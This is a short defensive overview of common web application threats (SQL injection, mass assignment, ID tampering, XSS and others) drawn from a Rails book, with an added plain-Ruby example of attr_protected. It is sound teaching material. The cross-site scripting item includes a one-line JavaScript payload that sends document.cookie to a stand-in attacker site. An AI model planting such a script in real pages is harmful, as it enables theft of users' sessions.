Overview of Security Threats
Here is a list of common security threats. None of them is
specific to web applications developed with Ruby on Rails.
This list is summarized from Agile Web Development with
Rails by Dave Thomas et al.
- SQL Injection. Inserting destructive SQL code in a URL
or in data that gets passed to the database. Solution: sanitize
(add the needed escape characters to) all content that is passed
to the database.
- Creating Records from Form Parameters. Example: if a
model has an admin property, an attacker could add an extra
form parameter and gain admin privileges. Solution: declare
attr_protected :admin in the model so that the admin property
must be set separately.
- Trusting ID Parameters. Users may edit the URL to
request records that do not belong to them. Scope the find method
so that it only retrieves records that belong to the current user.
- Exposed Controller Methods. Unless a controller
method is meant to be mapped to a request, make sure it is
declared protected or private.
- Cross-site scripting. This attack steals a user's cookie by having the vulnerable site send revealing JavaScript code to the victim's browser:
<script>
document.location="http://badguysite.net/steal/" + document.cookie
</script>
A web application should sanitize (provide escapes for
less-than brackets) all user-submitted content that is sent
to browsers.
- File uploads. Make sure that user-uploaded files are not placed among requested pages.
- Keeping sensitive information around. Don't let sensitive information persist (e.g. in the session variable) unless it is encrypted.
- Using SSL. Rails has a plug-in for SSL, which encrypts requests that are sent between the browser and server.
- Don't Cache Authenticated Pages.
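The "Creating Records from Form Parameters" item above, worked through in plain Ruby as an added example (this is not code from the book or from Rails itself): a small stand-in for a model with attr_protected, showing a submitted parameter hash that carries an extra admin field, the vulnerable "copy everything" assignment beside the protected one, and the separate explicit call that is the only way to set admin. The class names, the grant_admin! method and the sample parameters are assumptions made for the illustration.

```ruby
require 'set'

# Plain-Ruby stand-in for an ActiveRecord model with attr_protected
# (an added illustration, not Rails' own implementation).
class ProtectedModel
  def self.attr_protected(*names)
    protected_attributes.merge(names.map(&:to_s))
  end
  def self.protected_attributes
    @protected_attributes ||= Set.new
  end
  def initialize
    @attributes = {}
  end
  # Mass assignment from a form-parameter hash: protected keys are dropped,
  # so an extra user[admin]=1 field in the request never reaches the record.
  def attributes=(params)
    params.each do |key, value|
      next if self.class.protected_attributes.include?(key.to_s)
      @attributes[key.to_s] = value
    end
  end
  # The vulnerable pattern: copy every submitted parameter into the record.
  def assign_unfiltered!(params)
    params.each { |key, value| @attributes[key.to_s] = value }
  end
end

class User < ProtectedModel
  attr_protected :admin
  def admin?
    [true, '1', 'true'].include?(@attributes['admin'])
  end
  # The only way to become admin: an explicit call made by trusted code.
  def grant_admin!
    @attributes['admin'] = true
  end
end

# Constructed request: a sign-up form with an extra user[admin]=1 field added.
TAMPERED_PARAMS = { 'name' => 'mallory', 'admin' => '1' }.freeze

def create_user_unsafe(params)
  User.new.tap { |u| u.assign_unfiltered!(params) }  # admin? => true
end

def create_user(params)
  User.new.tap { |u| u.attributes = params }          # admin? => false
end
```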